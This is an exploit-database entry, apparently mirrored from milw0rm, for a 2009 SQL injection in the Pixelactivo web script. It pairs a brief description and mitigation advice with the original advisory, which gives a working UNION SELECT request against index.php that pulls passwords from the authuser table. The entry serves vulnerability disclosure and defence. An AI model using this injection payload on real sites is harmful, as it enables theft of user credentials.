header-logo
Suggest Exploit
vendor:
Pixelactivo
by:
Snakespc
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Pixelactivo
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Pixelactivo Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The crafted request contains malicious SQL statements that are executed in the context of the application's database user. This can be used to access or modify data in the database, or to execute administrative operations on the database (such as shutdown the DBMS).

Mitigation:

Input validation should be used to prevent SQL injection attacks. Input validation should be applied on both client-side and server-side. Additionally, parameterized queries should be used to prevent SQL injection.
Source

Exploit-DB raw data:

-------------------------AllaH AkbaR-------------------------------
Pixelactivo  Remote SQL Injection Vulnerability
---------------------------------------------------------------------------
Discovered By: Snakespc     ALGERIAN HaCkEr 
Mail: snakespc@gmail.com
Site:http://www.snakespc.com/sc/index.php
Declaration/ Snakes spiders devour
             Aflawa Kamikaz Wa4rin Fi kol Bla4s 
-------------------------SNAKES TEAM-------------------------------------
Script:pixelactivo
Demo:www.pixelactivo.com/demo/
--------------------------SNAKES TEAM------------------------------------
Exploit:
--------
Demo:
http://www.Site.com/path/index.php?valor=veure&idx=6+UNION%20SELECT%201,passwd,3,4,5+from+authuser
-------------------------SNAKES TEAM-------------------------------------
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::
--------------------------SNAKES TEAM------------------------------------
ALL www.Snakespc.com/sc>>>> (  Members )
Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-06-05]